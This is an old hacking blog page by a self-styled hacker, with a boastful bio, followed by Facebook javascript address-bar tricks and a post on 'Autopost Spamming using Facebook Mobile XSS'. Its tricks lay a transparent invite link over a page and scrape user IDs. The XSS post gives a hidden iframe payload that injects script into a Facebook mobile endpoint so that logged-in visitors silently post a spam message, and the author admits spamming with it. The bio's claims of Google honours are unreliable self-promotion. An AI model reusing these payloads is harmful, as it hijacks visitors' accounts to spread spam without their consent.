hahahah amol hacked ur ip address

Sign by Danasoft - For Backgrounds and Layouts


Amol Bhure (ultra l33t) was born in Maharashtra, Seventh July Of Nineteen Hundred Nineteen Ninety A.D. He's currently pursuing his B.E in Bangalore. A cyber Security Professional, Hacker, Designer, Programmer. Keen interest in hacking and network security and he developed several techniques of defending and defacing websites. He's of the opinion that people should learn this art to prevent any cyber attacks. Currently Amol works as a member of 'Null International', Bangalore chapter as a network security guy. Apart from this, he has done internships at YAHOO! India, AMAZON India, etc. He has also attended various International conferences like NullCon GOA, c0c0n, ClubHack, Defcon , SecurityByte, ICFoCS, OWASP, etc.. He is certified with RHCE, LPT, CEH v7, SCJP, AFCEH. In programming he knows stuffs on C, C++, C# , JAVA (SCJP), .NET , and PHP. Additionally he knows few hardware languages like HDL, VHDL, Verilog, Embedded Micro controller Programming. He has been featured on google hall of fame. Amol was named a "India's top 10 hacker" by google. "World's top 50 hacking blog" by google.

Daily Page Views

Thursday, April 28, 2011

If you are an admin of a facebook fan page or a facebook application page you can find the Suggest to Friends link on the left bottom part of the page for application page, while for a fan page, you can find it on the top right of your page. You can easily click the link to suggest your page to your friends. But the problem is, when you are not an admin of a certain page, you cant now find the link on that page. It was not like this before, Suggest to Friends was actually an Invite Friends link on the old version of a fan page/application page. Anyone could invite their friends at that time even when they’re not the admin.(amol)
Now it’s a little bit hard to suggest a facebook page to our friends when your not the admin. Many people ask, How to show Facebook Suggest to Friends Dialog ?. Well, we can use javascript address bar hack to show the dialog. using this simple code, the dialog will show whenever you click on any part of the page. @mol The link will show transparently overlayed in front of the page. Here is the script :

javascript:(function(){x=$('content').innerHTML;y=x.indexOf('_id');y=x.substring(y+4,y+27);x=y.substring(0,y.indexOf('"'));y=document.createElement('div');y.style.cssText='position:fixed;z-index:9;height:100%;';y.innerHTML='<a rel="dialog-post" href="http://amol-hackinglibrary.blogspot.com/" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&node_id='+x+'" class="UIImageBlock_Content" style="color:transparent;height:10000px">ultral33t amol</a>';z=document.getElementsByTagName('div')[0];z.parentNode.insertBefore(y,z);alert('Now click anywhere on this page, suggest page dialog will show – ultral33t amol');})()

  1. Copy the code above
  2. Go to the page you want to suggest, for example : Facebook GIF Animated Application
  3. Paste the code on the address bar
  4. Then press enter
  5. An alert will show, just click OK or press enter
  6. Click anywhere on that page, the Facebook Suggest to Friends Dialog will show


What is facebook ID? it’s a unique number identifying a facebook profile, facebook groups or fan pages.@mol : As you can see from other facebook profile, here’s an example for Facebook Bold Text profile URL :

See the url above, 139701732734451 is the facebook id. we will discuss about how to get the id. Below are some javascript address bar tricks you can use to find facebook id. @mol : You can get your own facebook id, your friends facebook id, or facebook groups/fan pages id programmatically.

To find your own facebook id, simply put this code on the address bar then press enter :

javascript:alert('Your ultral33t amol Facebook ID : '+Env['user'])

For friends facebook id, or facebook groups/fan pages id, simply go to the destination profile, then paste the code on the address bar. you can use one of these codes ;

1.If your profile or your friends/facebook page profile has profile picture, not the default silhouette one, use this :

javascript:x=$('profile_pic').src;y=x.substr(x.indexOf('_')+1);alert('ultral33t amol Facebook ID : '+y.substr(0,y.indexOf('_')))

2.This one is using facebook share link, we will get its link then get the profile id programmatically. You can use this if you can see share link on its profile page. here’s the code :

javascript:x=$('content').getElementsByTagName('a');for(i=0;i<x .length;i++)if(x[i].href.indexOf('[]')>1){y=x[i].href;alert('ultral33t amol Facebook ID : '+y.substr(y.indexOf('[]')+3));break};void(0)

3.And this is using xhpc_targetid, one of the form elements for sending message to destination wall. You can use this if you can post to the destination profile :

javascript:x=document.forms;for(i=0;i<x .length;i++){if(document.forms[i].xhpc_targetid){alert('Facebook ID : '+document.forms[i].xhpc_targetid.value);break}};void(0)

There are lots more tricks to see facebook id, but we cant discuss them all here. bcz some ppls are copying data and using for unwanted things . amol: plz dont copy . Some of the examples above will be enough for you to get the id.
Happy tweaking :):)


Friday, April 15, 2011

Autopost Spamming using Facebook Mobile XSS

@amol: What has happened out there really pushes me to share this out. I call this an Autopost Spamming using Facebook Mobile XSS. I dont care anymore if this one will be filtered, the faster they fix it, the better. People dont seem to care how hard i tried to hide this code from facebook team. frankly, i also use this to post spam with link to this blog, but it only affects indonesian ip + with a custom interval. So people outside indonesia wont be able to see this. Too bad it’s now spread like a worm everywhere wide open without any source code protection....@mol
Nevermind, it’s no use to complain about what has happened anyway. Let’s talk about this in details. This is about how to make an autopost status update to people’s facebook profile. This method uses XSS vulnerability of prompt_feed.php from m.facebook.com. When people see our page with this evil code, they will automatically post a status update with any message we want.
Below is the iframe HTML source code :

<iframe id="amol-hackinglibrary" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://tinyurl.com/ultral33t-amol Wow.. amol cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>

Put the code above on your website, change the red code with your own message. Whenever facebook logged in users see your page the message will be posted automatically to their wall.
That’s all. Happy spamming :(